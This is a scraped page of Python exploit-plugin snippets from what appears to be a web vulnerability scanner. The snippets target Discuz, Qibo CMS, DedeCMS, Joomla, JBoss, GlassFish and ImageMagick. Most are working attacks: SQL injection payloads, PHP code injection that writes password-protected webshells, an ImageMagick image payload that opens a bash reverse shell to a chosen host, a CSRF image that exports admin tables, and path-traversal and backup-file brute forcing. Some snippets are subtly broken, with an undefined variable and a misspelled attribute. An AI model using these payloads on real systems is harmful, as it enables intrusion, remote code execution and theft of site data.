예제 #1
0
    def _verify(self):
        result = Result(self)

        sig = '2c1743a391305fbf367df8e4f069f9f9'
        payload = {
            "formhash":
            "04949b0",
            "srchtxt":
            "aa",
            "srchtype":
            "threadsort",
            "st":
            "on",
            "sortid":
            "3",
            "selectsortid":
            "3 where tid=(select 1 from (select count(*),concat({0},floor(rand(0)*2))x from information_schema.tables group by x)a)#"
            .format(sig),
            "searchsubmit":
            "true"
        }

        url = self.urlJoin("/search.php")
        response = self.http.post(url, data=payload)

        if response.status_code == 200:
            if sig in response.content and "SQL" in response.content:
                result['fullpath'] = response.request.body
                result['payload'] = response.request.body

        return result
    def _attack(self):
        result = Result(self)

        vulfile = self.elseArgs.get("vulfile", None)
        vulpath = self.elseArgs.get("vulpath", None)

        if not vulfile or not vulpath:
            #print "Missing --elseargs, should be '--elseargs vulfile=shell.php#vulpath=http://aa.com'"
            result['isvul'] = result.ERROR
            result[
                'elseinfo'] = "Missing --elseargs, should be '--elseargs vulfile=shell.php#vulpath=http://aa.com'"
            return result

        self.params['step'] = "11"
        self.params['insLockfile'] = "a"
        self.params['s_lang'] = "a"
        self.params['install_demo_name'] = "../data/admin/config_update.php"

        url = self.urlJoin("/install/index.php")
        response1 = self.http.get(url, params=self.params)

        self.params['install_demo_name'] = vulfile
        self.params['updateHost'] = vulpath
        response2 = self.http.get(url, params=self.params)

        url = url.replace("index.php", vulfile)
        response3 = self.http.get(url)
        #print "debug>>>>>",response.request.url
        #print "debug>>>>>",response.content
        if response3.status_code == 200:
            result['shellpath'] = url

        return result
    def _info(self):
        result = Result(self)
        if "host" not in self.args or "port" not in self.args:
            result['isvul'] = result.ERROR
            result[
                'elseinfo'] = u"缺少参数host,port 请指定参数,例如--elseargs host=x.x.x.x#port=80"
            return result

        vulContent = (
            "push graphic-context\n"
            "viewbox 0 0 640 480\n"
            "fill 'url(https://example.com/image.jpg\"|bash -i >& /dev/tcp/host/port 0>&1\")'\n"
            "pop graphic-context")

        vulContent = vulContent.replace('host', self.args['host'])
        vulContent = vulContent.replace('port', self.args['port'])

        vulImagePath = os.path.join(sys.path[0], "else", "vul.png")
        with open(vulImagePath, "w") as _file:
            _file.write(vulContent)

        result['isvul'] = result.INFO
        result['payload'] = vulContent
        result['elseinfo'] = u"已生成vul图片{0}, 将该图片上传到服务器,进行图片操作".format(
            vulImagePath)

        return result
    def _attack(self):
        result = Result(self)

        phpPayload = "${@assert($_POST[alpha])}"

        sig = '9876541'
        
        self.params['mid'] = "1"
        self.params['action'] = "search"
        self.params['keyword'] = "asd"
        self.params['postdb[city_id]'] = "../../admin/hack"
        self.params['hack'] = "jfadmin"
        self.params['action'] = "addjf"
        self.params['Apower[jfadmin_mod]'] = "1"
        self.params['fid'] = "1"
        self.params['title'] = phpPayload

        url = self.urlJoin("/search.php")
        response1 = self.http.get(url, params=self.params)

        payload = {"alpha":"print {0};".format(sig)}
        url = url.replace("search.php","do/jf.php")
        response2 = self.http.post(url, data=payload)

        if response2.status_code == 200:
            if sig in response2.content:
                result['shellpath'] = self.baseURL+"/do/jf.php"
                result['vulinfo'] = "shell content: "+phpPayload

        return result
    def _verify(self):
        result = Result(self)

        phpPayload = "${@assert($_POST[alpha])}"
        #phpPayload = "${@fwrite(fopen('ali.php', 'w+'),'test')}"

        sig = '9876541'
        
        self.params['mid'] = "1"
        self.params['keyword'] = "asd"
        self.params['postdb[city_id]'] = "../../admin/hack"
        self.params['hack'] = "jfadmin"
        self.params['action'] = "addjf"
        self.params['Apower[jfadmin_mod]'] = "1"
        self.params['fid'] = "1"
        self.params['title'] = phpPayload

        url = self.urlJoin("/search.php")
        response1 = self.http.get(url, params=self.params)

        payload = {"alpha":"print {0};".format(sig)}
        url = url.replace("search.php","do/jf.php")
        response2 = self.http.post(url, data=payload)

        if response2.status_code == 200:
            if sig in response2.content:
                result['fullpath'] = self.url
                result['payload'] = str(payload)

        return result
    def _info(self):
        result = Result(self)

        result['isvul'] = result.INFO
        result['elseinfo'] = u"访问以下链接,查看是否可以下载附件:{0}".format(self.genBypassLink())

        return result
예제 #7
0
    def _verify(self):
        log = Log("exploit-discuz_brutefile")
        result = Result(self)

        dctype = self.args.get("type", "discuz").lower()
        if dctype not in ['discuz', 'discuzx']:
            dctype = "discuz"
        date = self.args.get("date", "15-01-01")
        days = self.args.get("days", "10")
        days = int(days)
        dirs = self.args.get("dirs", "1")
        dirs = int(dirs)

        url = self.baseURL if ".php" in self.url else self.url
        url = url.rstrip("/")
        alives = []
        for path in self.genPath(dctype, date, days, dirs):
            try:
                log.debug("request url {0}".format(url + path))
                response = self.http.get(url + path)
            except self.http.ConnectionError:
                pass

            if response.status_code == 200:
                log.debug("got alives {0}".format(url + path))
                alives.append(url + path)

        if alives:
            result['vulinfo'] = str(alives)

        return result
예제 #8
0
    def _info(self):
        result = Result(self)

        url = self.urlJoin("admin.php")

        filename = "alpha"
        params = "?action=db&operation=export&setup=1&scrolltop=&anchor=&type=custom&customtables%5B%5D=pre_ucenter_admins&method=multivol&sizelimit=2048&extendins=0&sqlcompat=&usehex=1&usezip=0&filename={0}&exportsubmit=yes".format(filename)
        
        payload = "<img src='{0}'>".format(url+params)

        result['isvul'] = Result.INFO
        result['fullpath'] = url
        result['elseinfo'] = u"发帖,嵌入图片{0},\n如果目标服务器为windows:\ndiscuzX访问/data/backup~1/{1}-1.sql,\ndiscuz访问/forumdata/backup~1/{1}-1.sql,\n目标服务器为linux则需要爆破backup_xxxxxx目录".format(payload,filename)

        return result
    def _attack(self):
        result = Result(self)

        phpPayload = "phpinfo();"
        sig = '_SERVER["HTTP_HOST"]'

        url = self.urlJoin("/inc/splitword.php")
        response = self.http.post(url, data={'Y2hlbmdzaGlzLmMjd': phpPayload})

        if response.status_code == 200:
            if sig in response.content:
                result['fullpath'] = url
                result['payload'] = "@eval($_POST['Y2hlbmdzaGlzLmMjd']);"

        return result
예제 #10
0
    def _verify(self):
        result = Result(self)

        php_code = '''echo "asdfgh123456";'''
        attack_payload = self._genPayload(php_code)

        response = self.http.get(self.url, headers={"User-Agent":attack_payload})

        if response.status_code == 200:
            response = self.http.get(self.url)
            if response.status_code == 200 and 'asdfgh123456' in response.content:
                result['fullpath'] = self.url
                result['payload'] = attack_payload

        return result
    def _verify(self):
        result = Result(self)

        sig = '2c1743a391305fbf367df8e4f069f9f9'
        params = "?inc=edit_sort&act=modify&name[]=yyy"
        payload = {"table_album": "{0}".format(sig)}

        url = self.urlJoin("/blog/ajax.php")
        response = self.http.post(url + params, params=payload)

        if response.status_code == 200:
            if sig in response.content and "doesn't exist" in response.content:
                result['fullpath'] = url
                result['payload'] = response.request.url

        return result
예제 #12
0
    def _verify(self):
        result = Result(self)

        sig = '_SERVER["HTTP_HOST"]'
        cookie = "GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();"
        headers = dict()
        headers['Cookie'] = cookie

        response = self.http.get(self.url, headers=headers)

        if response.status_code == 200:
            if sig in response.content:
                result['fullpath'] = self.url
                result['payload'] = 'Cookie: ' + cookie

        return result
예제 #13
0
    def _verify(self):
        result = Result(self)

        sig = '5201314520'
        payload = "extractvalue(1,concat(0x5c,(select {0})))".format(sig)

        self.params['tid'] = payload

        response = self.http.get(self.baseURL,
                                 params=self.params,
                                 allow_redirects=False)

        if response.status_code == 200:
            if sig in response.content:
                result['fullpath'] = self.url
                result['payload'] = payload

        return result
    def _verify(self):
        result = Result(self)

        sig = '2c1743a391305fbf367df8e4f069f9f9'
        payload = "1' and 1=2 union all select 1,'{0}".format(sig)
        self.params['mod'] = "attachment"
        self.params['findpost'] = "ss"
        self.params['aid'] = base64.b64encode(payload)

        url = self.urlJoin("/forum.php")
        response = self.http.get(url, params=self.params)

        if response.status_code == 200:
            if sig in response.request.url:
                result['fullpath'] = url
                result['payload'] = payload

        return result
예제 #15
0
    def _verify(self):
        result = Result(self)

        sig = '2c1743a391305fbf367df8e4f069f9f9'
        payload = "1 and select 1 from (select concat_ws(':', left(rand(), 3), {0}), count(*) from information_schema.tables group by 1)a;".format(sig)

        self.params['ac'] = 'view'
        self.params['shopid'] = payload

        url = self.urlJoin("/shop.php")
        response = self.http.get(url, params=self.params)

        if response.status_code == 200:
            if sig in response.content:
                result['fullpath'] = url
                result['payload'] = response.request.url

        return result
예제 #16
0
    def _verify(self):
        result = Result(self)

        sig = u"远程获取失败"
        
        self.params['step'] = "11"
        self.params['insLockfile'] = "a"
        self.params['s_lang'] = "a"
        self.params['install_demo_name'] = "../data/admin/config_update.php"

        url = self.urlJoin("/install/index.php")
        response = self.http.get(url, params=self.params)

        if response.status_code == 200:
            if sig.encode('gbk') in response.content or sig.encode('utf-8') in response.content:
                result['fullpath'] = url
                result['payload'] = str(self.params)

        return result
예제 #17
0
    def _attack(self):
        result = Result(self)

        uid = self.args.get("uid", "3")
        params = "?inc=edit_sort&act=modify&name[]=yyy"
        payload = {
            "table_album":
            "memberdata` set groupid=3 where uid={0}#".format(uid)
        }

        url = self.urlJoin("/blog/ajax.php")
        response = self.http.post(url + params, params=payload)

        if response.status_code == 200:
            if sig in response.content and "doesn't exist" in response.content:
                result['fullpath'] = url
                result['payload'] = response.request.url

        return result
예제 #18
0
    def _verify(self):
        result = Result(self)

        vulpaths = {"jmx-console": "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",
            "web-console"  : "/web-console/ServerInfo.jsp",
            "JMXInvokerServlet": "/invoker/JMXInvokerServlet",
            "admin-console" : "/admin-console/"}

        matchs = Dict()
        for path in vulpaths:
            url = self.urlJoin(vulpaths[path])
            response = self.http.get(url, allow_redirects=False)    
            if response.status_code == 200 or response.status_code == 500:
                matchs[path] = url

        if matchs:
            result['vulinfo'] = str(matchs)

        return result
예제 #19
0
    def _verify(self):
        result = Result(self)

        sig = '_SERVER["HTTP_HOST"]'
        payload = "<?php phpinfo();?>"
        params = "?inc=ol_module&step=2&step=2&moduleid=../../../../hack/template/admin&action=maketpl&Apower[template_list]=1&postdb[filepath]=template/blue.htm&postdb[code]={0}".format(payload)

        url = self.urlJoin("/blog/ajax.php")
        response = self.http.get(url+params)

        params2 = "?inc=edit_sort&job=../../../../template/blue"
        response2 = self.http.get(url+params2)

        if response2.status_code == 200:
            if sig in response2.content:
                result['fullpath'] = url
                result['payload'] = payload

        return result
예제 #20
0
    def _verify(self):
        result = Result(self)

        #php_code = '''echo "asdfgh123456";'''
        #attack_payload = self._genPayload(php_code)
        attack_payload = '''}__t|O:21:"JDatabaseDriverMysqli":2:{s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;s:7:"print_r";}s:13:"\x5C0\x5C0\x5C0connection";i:1;}\xF0\x9D\x8C\x86'''
        attack_payload = '''}__t|O:21:"JDatabaseDriverMysqli":2:{s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;s:7:"print_r";}s:13:"\\0\\0\\0connection";i:1;}\xF0\x9D\x8C\x86'''
        response = self.http.get(self.url,
                                 headers={"User-Agent": attack_payload})
        #time.sleep(10)

        if response.status_code == 200:
            response = self.http.get(self.url)
            print response.content
            if response.status_code == 200 and '*****@*****.**' in response.content:
                result['fullpath'] = self.url
                result['payload'] = attack_payload

        return result
    def _verify(self):
        result = Result(self)

        phpPayload = "@phpinfo()"
        params = "?label[a'.\"${%s}\".'][asd]=aaaa'" % phpPayload

        sig = '_SERVER["HTTP_HOST"]'

        url = self.urlJoin("/index.php")
        response = self.http.get(url + params)

        url2 = url.replace("index.php", "cache/label_cache/index_~1.php")
        response2 = self.http.get(url2)

        if response2.status_code == 200:
            if sig in response2.content:
                result['fullpath'] = self.url
                result['payload'] = str(phpPayload)

        return result
    def _verify(self):
        result = Result(self)

        sig = '9876541'
        params = "?step=1"
        payload = {
            "type":
            "area where 1=(updatexml(1,concat(0x5e24,(select {0}),0x5e24),1))#"
            .format(sig)
        }

        url = self.urlJoin("/blog/member/update_sort.php")
        response = self.http.get(url + params, params=payload)

        if response.status_code == 200:
            if sig in response.content:
                result['fullpath'] = url
                result['payload'] = response.request.url

        return result
    def _attack(self):
        result = Result(self)
        #php_code = '''print "start-->|";echo __FILE__;'''
        #php_code = '''print "start-->|";echo getcwd();'''
        #php_code = '''$s='<?php @eval($_POST["pass"]);?>';$n=dirname(dirname(dirname(__FILE__)))."/images/parse.php";$f=fopen($n,"w");fwrite($f,$s);'''
        php_code = '''$s='<?php $f=strrev($_GET["f"]);$f($_POST["pass"]);?>';$n=dirname(dirname(dirname(__FILE__)))."/images/parse.php";$f=fopen($n,"w");fwrite($f,$s);'''
        attack_payload = self._genPayload(php_code)

        response = self.http.get(self.url, headers={"User-Agent":attack_payload})
        
        if response.status_code == 200:
            response = self.http.get(self.url)
            response = self.http.get(self.urlJoin("/images/parse.php"))

            if response.status_code == 200:
                result['fullpath'] = self.url
                result['shellpath'] = "/images/parse.php?f=tressa"
                result['vulinfo'] = 'shell password: pass'

        return result
예제 #24
0
    def _verify(self):
        result = Result(self)

        sig = '9876541'
        params = "?inc=ol_module&step=2&moduleid=../../../../do/js&&id=514125&webdb[web_open]=1&webdb[cache_time_js]=-1"
        payload = {
            "pre":
            "qb_label where lid=-1 UNION SELECT 1,2,3,4,5,6,0,{0},9,10,11,12,13,14,15,16,17,18,19#"
            .format(sig)
        }

        url = self.urlJoin("/blog/ajax.php")
        response = self.http.get(url + params, params=payload)

        if response.status_code == 200:
            if sig in response.content:
                result['fullpath'] = url
                result['payload'] = response.request.url

        return result
    def _attack(self):
        result = Result(self)

        sig = u"才能浏览"
        userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
        headers = {'User-Agent': userAgent}

        response = self.http.get(self.url)
        response2 = self.http.get(self.url, headers=headers)

        if response2.status_code == 200:
            if sig.encode("utf-8") in response.content and sig.encode(
                    "gbk") in response.content and sig.encode(
                        "utf-8") not in response2.content and sig.encode(
                            "gbk") not in response2.content:
                with open("result.html", "w") as fd:
                    fd.write(response2.conetnt)
                result['attachment'] = "result.html"

        return result
    def _verify(self):
        result = Result(self)

        sig = u"才能浏览"
        userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
        #userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://**.**.**.**/search/spider.html)"
        headers = {'User-Agent': userAgent}

        response = self.http.get(self.url)
        response2 = self.http.get(self.url, headers=headers)

        if response2.status_code == 200:
            if sig.encode("utf-8") in response.content and sig.encode(
                    "gbk") in response.content and sig.encode(
                        "utf-8") not in response2.content and sig.encode(
                            "gbk") not in response2.content:
                result['fullpath'] = self.url
                result['payload'] = userAgent

        return result
예제 #27
0
    def _attack(self):
        result = Result(self)

        sig = "strrev"
        payload = '<?php $f=strrev($_GET["f"]);$f($_POST["pass"]);?>'
        params = "?inc=ol_module&step=2&step=2&moduleid=../../../../hack/template/admin&action=maketpl&Apower[template_list]=1&postdb[filepath]=template/green.htm&postdb[code]={0}".format(
            payload)

        url = self.urlJoin("/blog/ajax.php")
        response = self.http.get(url + params)

        url2 = url.replace("/blog/ajax.php", "/template/green.htm")
        response2 = self.http.get(url2)

        if response2.status_code == 200:
            if sig in response2.content:
                result[
                    'shellpath'] = url + "?inc=edit_sort&job=../../../../template/green&f=tressa"
                result['vulinfo'] = "webshell password: pass"

        return result
예제 #28
0
    def _verify(self):
        result = Result(self)

        sig = '2c1743a391305fbf367df8e4f069f9f9'
        payload = {
            "gids[66]":
            "'",
            "gids[88][0]":
            ") and (select 1 from (select count(*),concat({0},floor(rand(0)*2))x from information_schema.tables group by x)a)#"
            .format(sig)
        }

        url = self.url if "faq.php" in self.url else self.baseURL + "/faq.php?action=grouppermission"
        response = self.http.post(url, data=payload)

        if response.status_code == 200:
            if sig in response.content and "SQL" in response.content:
                result['fullpath'] = url
                result['payload'] = "Post:" + response.request.body

        return result
예제 #29
0
    def _verify(self):
        result = Result(self)

        paths = [
            "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/__admingui/WEB-INF/web.xml",
            "/theme/META-INF/%c0.%c0./%c0.%c0./__admingui/WEB-INF/web.xml",
            "/theme/META-INF/%E0%80%AE%E0%80%AE/%E0%80%AE%E0%80%AE/__admingui/WEB-INF/web.xml"
        ]

        signature = "<servlet-mapping>"
        matchs = []
        for path in paths:
            url = self.protocol + "://" + self.host + path

            response = self.http.get(url, allow_redirects=False)
            if response.status_code == 200:
                if signature in response.content:
                    matchs.append(url)

        if matchs:
            result['vulinfo'] = str(matchs)

        return result
예제 #30
0
    def _verify(self):
        log = Log("exploit_douphp_backupbrute")
        result = Result(self)

        sqlList = [
            'D20160~1.sql', 'D20150~1.sql', 'D20151~1.sql', 'D20140~1.sql',
            'D20141~1.sql', 'D20131~1.sql'
        ]

        vulURLs = []
        for sqlfile in sqlList:
            url = self.baseURL.rstrip("/") + "/data/backup/" + sqlfile

            log.debug("getting '{0}'".format(url))
            response = self.http.get(url, allow_redirects=False)

            if response.status_code == 200:
                log.debug("got alive'{0}'".format(url))
                vulURLs.append(url)

        if vulURLs:
            result['vulinfo'] = str(vulURLs)

        return result